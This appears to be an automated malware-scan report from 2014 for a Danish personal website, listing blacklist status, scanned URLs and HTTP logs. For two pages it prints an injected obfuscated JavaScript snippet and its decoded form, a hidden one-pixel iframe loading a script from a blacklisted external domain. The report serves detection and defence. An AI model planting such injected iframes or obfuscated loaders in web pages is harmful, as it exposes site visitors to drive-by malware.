Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bachelmstrom.dk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bachelmstrom.dk/ | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?ND | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?NA | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?MA | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?MD | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?SA | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?SD | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?DA | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/?DD | 200 OK Content-Length: 837 Content-Type: text/html | clean |
http://bachelmstrom.dk/webalizer/ | 200 OK Content-Length: 10001 Content-Type: text/html | clean |
http://bachelmstrom.dk/webalizer/usage_201412.html | 200 OK Content-Length: 113330 Content-Type: text/html | clean |
http://bachelmstrom.dk/familie/ | 200 OK Content-Length: 4768 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: inexper.com var DepanNegw=window;var DexeTelae=-44;DexeTelae+=45;XayeZebah='nedajemac';var GaDemee='e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');ZavevTa='fazemezarawaseb';var MezRai=parseInt;var DayahDet='zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag ve ...[2396 bytes skipped]... Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe> | ||
http://obscurewax.ru/AGP.js | 500 Can't connect to obscurewax.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://obscurewax.ru/test404page.js | 500 Can't connect to obscurewax.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://bachelmstrom.dk/familie/dorthe.html | 200 OK Content-Length: 3316 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: inexper.com var DepanNegw=window;var DexeTelae=-44;DexeTelae+=45;XayeZebah='nedajemac';var GaDemee='e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');ZavevTa='fazemezarawaseb';var MezRai=parseInt;var DayahDet='zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag ve ...[2396 bytes skipped]... Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bachelmstrom.dk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 13:10:22 GMT
Server: LiteSpeed
Content-Length: 837
Content-Type: text/html
X-Powered-By: PHP/5.3.29
...837 bytes of data.
GET / HTTP/1.1
Host: bachelmstrom.dk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 13:10:22 GMT
Server: LiteSpeed
Content-Length: 837
Content-Type: text/html
X-Powered-By: PHP/5.3.29
...837 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bachelmstrom.dk
Referer: http://www.google.com/search?q=bachelmstrom.dk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bachelmstrom.dk
Referer: http://www.google.com/search?q=bachelmstrom.dk
Result:
The result is similar to the first query. There are no suspicious redirects found.